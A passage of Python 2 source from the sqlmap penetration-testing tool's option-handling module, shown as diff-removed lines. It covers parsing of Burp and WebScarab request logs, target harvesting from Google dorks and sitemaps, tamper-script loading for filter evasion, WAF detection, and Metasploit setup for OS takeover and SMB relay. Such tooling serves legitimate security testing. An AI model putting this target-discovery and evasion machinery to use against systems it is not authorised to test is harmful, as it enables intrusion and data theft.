AttribDict -from 
lib.core.datatype import InjectionDict -from lib.core.defaults import defaults -from lib.core.dicts import DBMS_DICT -from lib.core.dicts import DUMP_REPLACEMENTS -from lib.core.enums import ADJUST_TIME_DELAY -from lib.core.enums import AUTH_TYPE -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import DUMP_FORMAT -from lib.core.enums import HTTP_HEADER -from lib.core.enums import HTTPMETHOD -from lib.core.enums import MOBILES -from lib.core.enums import OPTION_TYPE -from lib.core.enums import PAYLOAD -from lib.core.enums import PRIORITY -from lib.core.enums import PROXY_TYPE -from lib.core.enums import REFLECTIVE_COUNTER -from lib.core.enums import WIZARD -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapInstallationException -from lib.core.exception import SqlmapMissingDependence -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapSilentQuitException -from lib.core.exception import SqlmapSyntaxException -from lib.core.exception import SqlmapSystemException -from lib.core.exception import SqlmapUnsupportedDBMSException -from lib.core.exception import SqlmapUserQuitException -from lib.core.log import FORMATTER -from lib.core.optiondict import optDict -from lib.core.settings import BURP_REQUEST_REGEX -from lib.core.settings import BURP_XML_HISTORY_REGEX -from lib.core.settings import CODECS_LIST_PAGE -from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS -from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR -from lib.core.settings import DBMS_ALIASES -from lib.core.settings import DEFAULT_PAGE_ENCODING -from lib.core.settings import DEFAULT_TOR_HTTP_PORTS -from lib.core.settings import DEFAULT_TOR_SOCKS_PORT -from 
lib.core.settings import DUMMY_URL -from lib.core.settings import IGNORE_SAVE_OPTIONS -from lib.core.settings import INJECT_HERE_MARK -from lib.core.settings import IS_WIN -from lib.core.settings import KB_CHARS_BOUNDARY_CHAR -from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET -from lib.core.settings import LOCALHOST -from lib.core.settings import MAX_CONNECT_RETRIES -from lib.core.settings import MAX_NUMBER_OF_THREADS -from lib.core.settings import NULL -from lib.core.settings import PARAMETER_SPLITTING_REGEX -from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS -from lib.core.settings import SITE -from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE -from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX -from lib.core.settings import SUPPORTED_DBMS -from lib.core.settings import SUPPORTED_OS -from lib.core.settings import TIME_DELAY_CANDIDATES -from lib.core.settings import UNION_CHAR_REGEX -from lib.core.settings import UNKNOWN_DBMS_VERSION -from lib.core.settings import URI_INJECTABLE_REGEX -from lib.core.settings import VERSION_STRING -from lib.core.settings import WEBSCARAB_SPLITTER -from lib.core.threads import getCurrentThreadData -from lib.core.update import update -from lib.parse.configfile import configFileParser -from lib.parse.payloads import loadBoundaries -from lib.parse.payloads import loadPayloads -from lib.parse.sitemap import parseSitemap -from lib.request.basic import checkCharEncoding -from lib.request.connect import Connect as Request -from lib.request.dns import DNSServer -from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler -from lib.request.httpshandler import HTTPSHandler -from lib.request.pkihandler import HTTPSPKIAuthHandler -from lib.request.rangehandler import HTTPRangeHandler -from lib.request.redirecthandler import SmartRedirectHandler -from lib.request.templates import getPageTemplate -from lib.utils.crawler import crawl -from lib.utils.deps import checkDependencies -from 
lib.utils.search import search -from lib.utils.purge import purge -from thirdparty.colorama.initialise import init as coloramainit -from thirdparty.keepalive import keepalive -from thirdparty.oset.pyoset import oset -from thirdparty.socks import socks -from xml.etree.ElementTree import ElementTree - -authHandler = urllib2.BaseHandler() -httpsHandler = HTTPSHandler() -keepAliveHandler = keepalive.HTTPHandler() -proxyHandler = urllib2.ProxyHandler() -redirectHandler = SmartRedirectHandler() -rangeHandler = HTTPRangeHandler() - -def _feedTargetsDict(reqFile, addedTargetUrls): - """ - Parses web scarab and burp logs and adds results to the target URL list - """ - - def _parseWebScarabLog(content): - """ - Parses web scarab logs (POST method not supported) - """ - - reqResList = content.split(WEBSCARAB_SPLITTER) - - for request in reqResList: - url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) - method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) - cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) - - if not method or not url: - logger.debug("not a valid WebScarab log data") - continue - - if method.upper() == HTTPMETHOD.POST: - warnMsg = "POST requests from WebScarab logs aren't supported " - warnMsg += "as their body content is stored in separate files. " - warnMsg += "Nevertheless you can use -r to load them individually." 
- logger.warning(warnMsg) - continue - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, method, None, cookie, None)) - addedTargetUrls.add(url) - - def _parseBurpLog(content): - """ - Parses burp logs - """ - - if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): - if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S): - reqResList = [] - for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): - port, request = match.groups() - request = request.decode("base64") - _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) - if _: - host = _.group(0).strip() - if not re.search(r":\d+\Z", host): - request = request.replace(host, "%s:%d" % (host, int(port))) - reqResList.append(request) - else: - reqResList = [content] - else: - reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) - - for match in reqResList: - request = match if isinstance(match, basestring) else match.group(0) - request = re.sub(r"\A[^\w]+", "", request) - - schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) - - if schemePort: - scheme = schemePort.group(1) - port = schemePort.group(2) - else: - scheme, port = None, None - - if not re.search(r"^[\n]*(%s).*?\sHTTP\/" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), request, re.I | re.M): - continue - - if re.search(r"^[\n]*%s.*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M): - continue - - getPostReq = False - url = None - host = None - method = None - data = None - cookie = None - params = False - newline = None - lines = request.split('\n') - headers = [] - - for index in xrange(len(lines)): - line = lines[index] - - if not line.strip() and index == len(lines) - 1: - break - - newline = "\r\n" if line.endswith('\r') else '\n' - line = line.strip('\r') - match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % 
"|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None - - if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None: - data = "" - params = True - - elif match: - method = match.group(1) - url = match.group(2) - - if any(_ in line for _ in ('?', '=', CUSTOM_INJECTION_MARK_CHAR)): - params = True - - getPostReq = True - - # POST parameters - elif data is not None and params: - data += "%s%s" % (line, newline) - - # GET parameters - elif "?" in line and "=" in line and ": " not in line: - params = True - - # Headers - elif re.search(r"\A\S+:", line): - key, value = line.split(":", 1) - value = value.strip().replace("\r", "").replace("\n", "") - - # Cookie and Host headers - if key.upper() == HTTP_HEADER.COOKIE.upper(): - cookie = value - elif key.upper() == HTTP_HEADER.HOST.upper(): - if '://' in value: - scheme, value = value.split('://')[:2] - splitValue = value.split(":") - host = splitValue[0] - - if len(splitValue) > 1: - port = filterStringValue(splitValue[1], "[0-9]") - - # Avoid to add a static content length header to - # headers and consider the following lines as - # POSTed data - if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): - params = True - - # Avoid proxy and connection type related headers - elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION): - headers.append((getUnicode(key), getUnicode(value))) - - if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""): - params = True - - data = data.rstrip("\r\n") if data else data - - if getPostReq and (params or cookie): - if not port and isinstance(scheme, basestring) and scheme.lower() == "https": - port = "443" - elif not scheme and port == "443": - scheme = "https" - - if conf.forceSSL: - scheme = "https" - port = port or "443" - - if not host: - errMsg = "invalid format of a request file" - raise SqlmapSyntaxException, errMsg - - if not url.startswith("http"): - url = "%s://%s:%s%s" % 
(scheme or "http", host, port or "80", url) - scheme = None - port = None - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, conf.method or method, data, cookie, tuple(headers))) - addedTargetUrls.add(url) - - checkFile(reqFile) - try: - with openFile(reqFile, "rb") as f: - content = f.read() - except (IOError, OSError, MemoryError), ex: - errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex)) - raise SqlmapSystemException(errMsg) - - if conf.scope: - logger.info("using regular expression '%s' for filtering targets" % conf.scope) - - _parseBurpLog(content) - _parseWebScarabLog(content) - - if not addedTargetUrls: - errMsg = "unable to find usable request(s) " - errMsg += "in provided file ('%s')" % reqFile - raise SqlmapGenericException(errMsg) - -def _loadQueries(): - """ - Loads queries from 'xml/queries.xml' file. - """ - - def iterate(node, retVal=None): - class DictObject(object): - def __init__(self): - self.__dict__ = {} - - def __contains__(self, name): - return name in self.__dict__ - - if retVal is None: - retVal = DictObject() - - for child in node.findall("*"): - instance = DictObject() - retVal.__dict__[child.tag] = instance - if child.attrib: - instance.__dict__.update(child.attrib) - else: - iterate(child, instance) - - return retVal - - tree = ElementTree() - try: - tree.parse(paths.QUERIES_XML) - except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - - for node in tree.findall("*"): - queries[node.attrib['value']] = iterate(node) - -def _setMultipleTargets(): - """ - Define a configuration parameter if we are running in multiple target - mode. 
- """ - - initialTargetsCount = len(kb.targets) - addedTargetUrls = set() - - if not conf.logFile: - return - - debugMsg = "parsing targets list from '%s'" % conf.logFile - logger.debug(debugMsg) - - if not os.path.exists(conf.logFile): - errMsg = "the specified list of targets does not exist" - raise SqlmapFilePathException(errMsg) - - if os.path.isfile(conf.logFile): - _feedTargetsDict(conf.logFile, addedTargetUrls) - - elif os.path.isdir(conf.logFile): - files = os.listdir(conf.logFile) - files.sort() - - for reqFile in files: - if not re.search("([\d]+)\-request", reqFile): - continue - - _feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls) - - else: - errMsg = "the specified list of targets is not a file " - errMsg += "nor a directory" - raise SqlmapFilePathException(errMsg) - - updatedTargetsCount = len(kb.targets) - - if updatedTargetsCount > initialTargetsCount: - infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount) - infoMsg += "(parameter unique) requests from the " - infoMsg += "targets list ready to be tested" - logger.info(infoMsg) - -def _adjustLoggingFormatter(): - """ - Solves problem of line deletition caused by overlapping logging messages - and retrieved data info in inference mode - """ - - if hasattr(FORMATTER, '_format'): - return - - def format(record): - message = FORMATTER._format(record) - message = boldifyMessage(message) - if kb.get("prependFlag"): - message = "\n%s" % message - kb.prependFlag = False - return message - - FORMATTER._format = FORMATTER.format - FORMATTER.format = format - -def _setRequestFromFile(): - """ - This function checks if the way to make a HTTP request is through supplied - textual file, parses it and saves the information into the knowledge base. 
- """ - - if not conf.requestFile: - return - - addedTargetUrls = set() - - conf.requestFile = safeExpandUser(conf.requestFile) - - infoMsg = "parsing HTTP request from '%s'" % conf.requestFile - logger.info(infoMsg) - - if not os.path.isfile(conf.requestFile): - errMsg = "the specified HTTP request file " - errMsg += "does not exist" - raise SqlmapFilePathException(errMsg) - - _feedTargetsDict(conf.requestFile, addedTargetUrls) - -def _setCrawler(): - if not conf.crawlDepth: - return - - if not any((conf.bulkFile, conf.sitemapUrl)): - crawl(conf.url) - else: - if conf.bulkFile: - targets = getFileItems(conf.bulkFile) - else: - targets = parseSitemap(conf.sitemapUrl) - for i in xrange(len(targets)): - try: - target = targets[i] - crawl(target) - - if conf.verbose in (1, 2): - status = "%d/%d links visited (%d%%)" % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets))) - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) - except Exception, ex: - errMsg = "problem occurred while crawling at '%s' ('%s')" % (target, getSafeExString(ex)) - logger.error(errMsg) - -def _doSearch(): - """ - This function performs search dorking, parses results - and saves the testable hosts into the knowledge base. - """ - - if not conf.googleDork: - return - - kb.data.onlyGETs = None - - def retrieve(): - links = search(conf.googleDork) - - if not links: - errMsg = "unable to find results for your " - errMsg += "search dork expression" - raise SqlmapGenericException(errMsg) - - for link in links: - link = urldecode(link) - if re.search(r"(.*?)\?(.+)", link): - kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) - elif re.search(URI_INJECTABLE_REGEX, link, re.I): - if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork: - message = "do you want to scan only results containing GET parameters? 
[Y/n] " - test = readInput(message, default="Y") - kb.data.onlyGETs = test.lower() != 'n' - if not kb.data.onlyGETs or conf.googleDork: - kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) - - return links - - while True: - links = retrieve() - - if kb.targets: - infoMsg = "sqlmap got %d results for your " % len(links) - infoMsg += "search dork expression, " - - if len(links) == len(kb.targets): - infoMsg += "all " - else: - infoMsg += "%d " % len(kb.targets) - - infoMsg += "of them are testable targets" - logger.info(infoMsg) - break - - else: - message = "sqlmap got %d results " % len(links) - message += "for your search dork expression, but none of them " - message += "have GET parameters to test for SQL injection. " - message += "Do you want to skip to the next result page? [Y/n]" - test = readInput(message, default="Y") - - if test[0] in ("n", "N"): - raise SqlmapSilentQuitException - else: - conf.googlePage += 1 - -def _setBulkMultipleTargets(): - if not conf.bulkFile: - return - - conf.bulkFile = safeExpandUser(conf.bulkFile) - - infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile - logger.info(infoMsg) - - if not os.path.isfile(conf.bulkFile): - errMsg = "the specified bulk file " - errMsg += "does not exist" - raise SqlmapFilePathException(errMsg) - - found = False - for line in getFileItems(conf.bulkFile): - if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line: - found = True - kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None)) - - if not found and not conf.forms and not conf.crawlDepth: - warnMsg = "no usable links found (with GET parameters)" - logger.warn(warnMsg) - -def _setSitemapTargets(): - if not conf.sitemapUrl: - return - - infoMsg = "parsing sitemap '%s'" % conf.sitemapUrl - logger.info(infoMsg) - - found = False - for item in parseSitemap(conf.sitemapUrl): - if re.match(r"[^ ]+\?(.+)", item, re.I): - found = True - kb.targets.add((item.strip(), None, None, None, 
None)) - - if not found and not conf.forms and not conf.crawlDepth: - warnMsg = "no usable links found (with GET parameters)" - logger.warn(warnMsg) - -def _findPageForms(): - if not conf.forms or conf.crawlDepth: - return - - if conf.url and not checkConnection(): - return - - infoMsg = "searching for forms" - logger.info(infoMsg) - - if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)): - page, _ = Request.queryPage(content=True) - findPageForms(page, conf.url, True, True) - else: - if conf.bulkFile: - targets = getFileItems(conf.bulkFile) - elif conf.sitemapUrl: - targets = parseSitemap(conf.sitemapUrl) - elif conf.googleDork: - targets = [_[0] for _ in kb.targets] - kb.targets.clear() - for i in xrange(len(targets)): - try: - target = targets[i] - page, _, _ = Request.getPage(url=target.strip(), crawling=True, raise404=False) - findPageForms(page, target, False, True) - - if conf.verbose in (1, 2): - status = '%d/%d links visited (%d%%)' % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets))) - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) - except KeyboardInterrupt: - break - except Exception, ex: - errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex)) - logger.error(errMsg) - -def _setDBMSAuthentication(): - """ - Check and set the DBMS authentication credentials to run statements as - another user, not the session user - """ - - if not conf.dbmsCred: - return - - debugMsg = "setting the DBMS authentication credentials" - logger.debug(debugMsg) - - match = re.search("^(.+?):(.*?)$", conf.dbmsCred) - - if not match: - errMsg = "DBMS authentication credentials value must be in format " - errMsg += "username:password" - raise SqlmapSyntaxException(errMsg) - - conf.dbmsUsername = match.group(1) - conf.dbmsPassword = match.group(2) - -def _setMetasploit(): - if not conf.osPwn and not conf.osSmb and not conf.osBof: - return - - debugMsg = "setting the takeover out-of-band 
functionality" - logger.debug(debugMsg) - - msfEnvPathExists = False - - if IS_WIN: - try: - import win32file - except ImportError: - errMsg = "sqlmap requires third-party module 'pywin32' " - errMsg += "in order to use Metasploit functionalities on " - errMsg += "Windows. You can download it from " - errMsg += "'http://sourceforge.net/projects/pywin32/files/pywin32/'" - raise SqlmapMissingDependence(errMsg) - - if not conf.msfPath: - def _(key, value): - retVal = None - - try: - from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE - _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE) - _ = OpenKey(_, key) - retVal = QueryValueEx(_, value)[0] - except: - logger.debug("unable to identify Metasploit installation path via registry key") - - return retVal - - conf.msfPath = _(r"SOFTWARE\Rapid7\Metasploit", "Location") - if conf.msfPath: - conf.msfPath = os.path.join(conf.msfPath, "msf3") - - if conf.osSmb: - isAdmin = runningAsAdmin() - - if not isAdmin: - errMsg = "you need to run sqlmap as an administrator " - errMsg += "if you want to perform a SMB relay attack because " - errMsg += "it will need to listen on a user-specified SMB " - errMsg += "TCP port for incoming connection attempts" - raise SqlmapMissingPrivileges(errMsg) - - if conf.msfPath: - for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")): - if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")): - msfEnvPathExists = True - if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)): - kb.oldMsf = False - elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")): - kb.oldMsf = True - else: - msfEnvPathExists = False - - conf.msfPath = path - break - - if msfEnvPathExists: - debugMsg = "provided Metasploit Framework path " - debugMsg += "'%s' is valid" % conf.msfPath - logger.debug(debugMsg) - else: - warnMsg = "the provided Metasploit Framework path " - warnMsg += "'%s' 
is not valid. The cause could " % conf.msfPath - warnMsg += "be that the path does not exists or that one " - warnMsg += "or more of the needed Metasploit executables " - warnMsg += "within msfcli, msfconsole, msfencode and " - warnMsg += "msfpayload do not exist" - logger.warn(warnMsg) - else: - warnMsg = "you did not provide the local path where Metasploit " - warnMsg += "Framework is installed" - logger.warn(warnMsg) - - if not msfEnvPathExists: - warnMsg = "sqlmap is going to look for Metasploit Framework " - warnMsg += "installation inside the environment path(s)" - logger.warn(warnMsg) - - envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":") - - for envPath in envPaths: - envPath = envPath.replace(";", "") - - if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")): - msfEnvPathExists = True - if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)): - kb.oldMsf = False - elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")): - kb.oldMsf = True - else: - msfEnvPathExists = False - - if msfEnvPathExists: - infoMsg = "Metasploit Framework has been found " - infoMsg += "installed in the '%s' path" % envPath - logger.info(infoMsg) - - conf.msfPath = envPath - - break - - if not msfEnvPathExists: - errMsg = "unable to locate Metasploit Framework installation. 
" - errMsg += "You can get it at 'http://www.metasploit.com/download/'" - raise SqlmapFilePathException(errMsg) - -def _setWriteFile(): - if not conf.wFile: - return - - debugMsg = "setting the write file functionality" - logger.debug(debugMsg) - - if not os.path.exists(conf.wFile): - errMsg = "the provided local file '%s' does not exist" % conf.wFile - raise SqlmapFilePathException(errMsg) - - if not conf.dFile: - errMsg = "you did not provide the back-end DBMS absolute path " - errMsg += "where you want to write the local file '%s'" % conf.wFile - raise SqlmapMissingMandatoryOptionException(errMsg) - - conf.wFileType = getFileType(conf.wFile) - -def _setOS(): - """ - Force the back-end DBMS operating system option. - """ - - if not conf.os: - return - - if conf.os.lower() not in SUPPORTED_OS: - errMsg = "you provided an unsupported back-end DBMS operating " - errMsg += "system. The supported DBMS operating systems for OS " - errMsg += "and file system access are %s. " % ', '.join([o.capitalize() for o in SUPPORTED_OS]) - errMsg += "If you do not know the back-end DBMS underlying OS, " - errMsg += "do not provide it and sqlmap will fingerprint it for " - errMsg += "you." - raise SqlmapUnsupportedDBMSException(errMsg) - - debugMsg = "forcing back-end DBMS operating system to user defined " - debugMsg += "value '%s'" % conf.os - logger.debug(debugMsg) - - Backend.setOs(conf.os) - -def _setTechnique(): - validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1]) - validLetters = [_[0][0].upper() for _ in validTechniques] - - if conf.tech and isinstance(conf.tech, basestring): - _ = [] - - for letter in conf.tech.upper(): - if letter not in validLetters: - errMsg = "value for --technique must be a string composed " - errMsg += "by the letters %s. 
Refer to the " % ", ".join(validLetters) - errMsg += "user's manual for details" - raise SqlmapSyntaxException(errMsg) - - for validTech, validInt in validTechniques: - if letter == validTech[0]: - _.append(validInt) - break - - conf.tech = _ - -def _setDBMS(): - """ - Force the back-end DBMS option. - """ - - if not conf.dbms: - return - - debugMsg = "forcing back-end DBMS to user defined value" - logger.debug(debugMsg) - - conf.dbms = conf.dbms.lower() - regex = re.search("%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I) - - if regex: - conf.dbms = regex.group(1) - Backend.setVersion(regex.group(2)) - - if conf.dbms not in SUPPORTED_DBMS: - errMsg = "you provided an unsupported back-end database management " - errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(_ for _ in DBMS_DICT)) - errMsg += "If you do not know the back-end DBMS, do not provide " - errMsg += "it and sqlmap will fingerprint it for you." - raise SqlmapUnsupportedDBMSException(errMsg) - - for dbms, aliases in DBMS_ALIASES: - if conf.dbms in aliases: - conf.dbms = dbms - - break - -def _setTamperingFunctions(): - """ - Loads tampering functions from given script(s) - """ - - if conf.tamper: - last_priority = PRIORITY.HIGHEST - check_priority = True - resolve_priorities = False - priorities = [] - - for tfile in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): - found = False - - tfile = tfile.strip() - - if not tfile: - continue - - elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)): - tfile = os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile) - - elif not os.path.exists(tfile): - errMsg = "tamper script '%s' does not exist" % tfile - raise SqlmapFilePathException(errMsg) - - elif not tfile.endswith('.py'): - errMsg = "tamper script '%s' should have an extension '.py'" % tfile - raise SqlmapSyntaxException(errMsg) - - dirname, 
filename = os.path.split(tfile) - dirname = os.path.abspath(dirname) - - infoMsg = "loading tamper script '%s'" % filename[:-3] - logger.info(infoMsg) - - if not os.path.exists(os.path.join(dirname, '__init__.py')): - errMsg = "make sure that there is an empty file '__init__.py' " - errMsg += "inside of tamper scripts directory '%s'" % dirname - raise SqlmapGenericException(errMsg) - - if dirname not in sys.path: - sys.path.insert(0, dirname) - - try: - module = __import__(filename[:-3].encode(sys.getfilesystemencoding())) - except (ImportError, SyntaxError), msg: - raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg)) - - priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__ - - for name, function in inspect.getmembers(module, inspect.isfunction): - if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs": - found = True - kb.tamperFunctions.append(function) - function.func_name = module.__name__ - - if check_priority and priority > last_priority: - message = "it seems that you might have mixed " - message += "the order of tamper scripts. " - message += "Do you want to auto resolve this? 
[Y/n/q] " - test = readInput(message, default="Y") - - if not test or test[0] in ("y", "Y"): - resolve_priorities = True - elif test[0] in ("n", "N"): - resolve_priorities = False - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - - check_priority = False - - priorities.append((priority, function)) - last_priority = priority - - break - elif name == "dependencies": - function() - - if not found: - errMsg = "missing function 'tamper(payload, **kwargs)' " - errMsg += "in tamper script '%s'" % tfile - raise SqlmapGenericException(errMsg) - - if kb.tamperFunctions and len(kb.tamperFunctions) > 3: - warnMsg = "using too many tamper scripts is usually not " - warnMsg += "a good idea" - logger.warning(warnMsg) - - if resolve_priorities and priorities: - priorities.sort(reverse=True) - kb.tamperFunctions = [] - - for _, function in priorities: - kb.tamperFunctions.append(function) - -def _setWafFunctions(): - """ - Loads WAF/IDS/IPS detecting functions from script(s) - """ - - if conf.identifyWaf: - for found in glob.glob(os.path.join(paths.SQLMAP_WAF_PATH, "*.py")): - dirname, filename = os.path.split(found) - dirname = os.path.abspath(dirname) - - if filename == "__init__.py": - continue - - debugMsg = "loading WAF script '%s'" % filename[:-3] - logger.debug(debugMsg) - - if dirname not in sys.path: - sys.path.insert(0, dirname) - - try: - if filename[:-3] in sys.modules: - del sys.modules[filename[:-3]] - module = __import__(filename[:-3]) - except ImportError, msg: - raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg)) - - _ = dict(inspect.getmembers(module)) - if "detect" not in _: - errMsg = "missing function 'detect(get_page)' " - errMsg += "in WAF script '%s'" % found - raise SqlmapGenericException(errMsg) - else: - kb.wafFunctions.append((_["detect"], _.get("__product__", filename[:-3]))) - -def _setThreads(): - if not isinstance(conf.threads, int) or conf.threads <= 0: - conf.threads = 1 - -def _setDNSCache(): - 
""" - Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests. - """ - - def _getaddrinfo(*args, **kwargs): - if args in kb.cache: - return kb.cache[args] - - else: - kb.cache[args] = socket._getaddrinfo(*args, **kwargs) - return kb.cache[args] - - if not hasattr(socket, "_getaddrinfo"): - socket._getaddrinfo = socket.getaddrinfo - socket.getaddrinfo = _getaddrinfo - -def _setSocketPreConnect(): - """ - Makes a pre-connect version of socket.connect - """ - - if conf.disablePrecon: - return - - def _(): - while kb.threadContinue and not conf.disablePrecon: - try: - for key in socket._ready: - if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE: - family, type, proto, address = key - s = socket.socket(family, type, proto) - s._connect(address) - with kb.locks.socket: - socket._ready[key].append(s._sock) - except KeyboardInterrupt: - break - except: - pass - finally: - time.sleep(0.01) - - def connect(self, address): - found = False - - key = (self.family, self.type, self.proto, address) - with kb.locks.socket: - if key not in socket._ready: - socket._ready[key] = [] - if len(socket._ready[key]) > 0: - self._sock = socket._ready[key].pop(0) - found = True - - if not found: - self._connect(address) - - if not hasattr(socket.socket, "_connect"): - socket._ready = {} - socket.socket._connect = socket.socket.connect - socket.socket.connect = connect - - thread = threading.Thread(target=_) - thread.start() - -def _setHTTPHandlers(): - """ - Check and set the HTTP/SOCKS proxy for all HTTP requests. 
- """ - global proxyHandler - - for _ in ("http", "https"): - if hasattr(proxyHandler, "%s_open" % _): - delattr(proxyHandler, "%s_open" % _) - - if conf.proxyList is not None: - if not conf.proxyList: - errMsg = "list of usable proxies is exhausted" - raise SqlmapNoneDataException(errMsg) - - conf.proxy = conf.proxyList[0] - conf.proxyList = conf.proxyList[1:] - - infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy - logger.info(infoMsg) - - elif not conf.proxy: - if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy: - proxyHandler.proxies = {} - - if conf.proxy: - debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" - logger.debug(debugMsg) - - try: - _ = urlparse.urlsplit(conf.proxy) - except Exception, ex: - errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex)) - raise SqlmapSyntaxException, errMsg - - hostnamePort = _.netloc.split(":") - - scheme = _.scheme.upper() - hostname = hostnamePort[0] - port = None - username = None - password = None - - if len(hostnamePort) == 2: - try: - port = int(hostnamePort[1]) - except: - pass # drops into the next check block - - if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): - errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) - raise SqlmapSyntaxException(errMsg) - - if conf.proxyCred: - _ = re.search("^(.*?):(.*?)$", conf.proxyCred) - if not _: - errMsg = "proxy authentication credentials " - errMsg += "value must be in format username:password" - raise SqlmapSyntaxException(errMsg) - else: - username = _.group(1) - password = _.group(2) - - if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): - proxyHandler.proxies = {} - - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) - socks.wrapmodule(urllib2) - else: - socks.unwrapmodule(urllib2) - - 
